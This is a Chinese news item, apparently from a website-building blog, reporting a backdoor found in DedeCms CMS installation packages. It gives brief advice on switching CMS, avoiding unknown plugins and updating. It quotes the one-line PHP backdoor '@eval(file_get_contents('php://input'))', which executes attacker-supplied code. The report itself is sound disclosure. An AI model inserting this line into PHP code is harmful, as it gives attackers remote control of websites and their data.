最新消息 , 瑞星与 360 今日对外发布警示 , 称国内知名的 php 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门 , 黑客可通过此后门直接获得网站的控制权限 , 获取存储在服务器上的文件和数据库 。
文章插图
据第三方权威统计数据显示 , 目前约有 50 万网站使用该dedecms系统搭建 , 涉及企业、政府机关、媒体机构、行业及个人网站等 。
安全界人士分析发现 , 此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));” , 黑客只需要构造简单的数据包提交到服务器 , 就能够获取到该网站的 WebShell , 通过对服务器进一步渗透攻击 , 进而获取服务器的最高权限 , 直接访问服务器上的文件、数据库等信息 。
下面小熊优化的小编给出一个相关建议:
1、尽快转换系统 , 可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms , phpcms、jtbc等已停止更新了 , 建议不要使用了 。
2、尽量不要网上下载不知名的插件 , 尤其使用wp的网站 , 大多被黑的都是网上乱用插件导致的 。
3、保持系统更新 , 官方更新的版本及时更新上 , 不要感觉现在功能够用了就不更新 , 有时候更新不仅仅是功能更新 , 也是安全上的更新 。
【织梦CMS建站系统被曝漏洞】
推荐阅读
- 快速用WordPress建站
- WordPress建站系统的运行速度优化
- 帝国CMS的魔术引用及其开启方法
- 虚拟主机如何安装PageAdmin建站系统
- 如何降低Shopify自建站跳出率?
- 帝国cms灵动标签调用标题图片没有图片时让其显示默认图片的方法
- WordPress建站的8大好处
- 最完整的WordPress建站教程
- 帝国CMS列表页面调用关键字TAG的方法
- 帝国CMS7.5后台文章关键字和系统TAGS自动同步更新的方法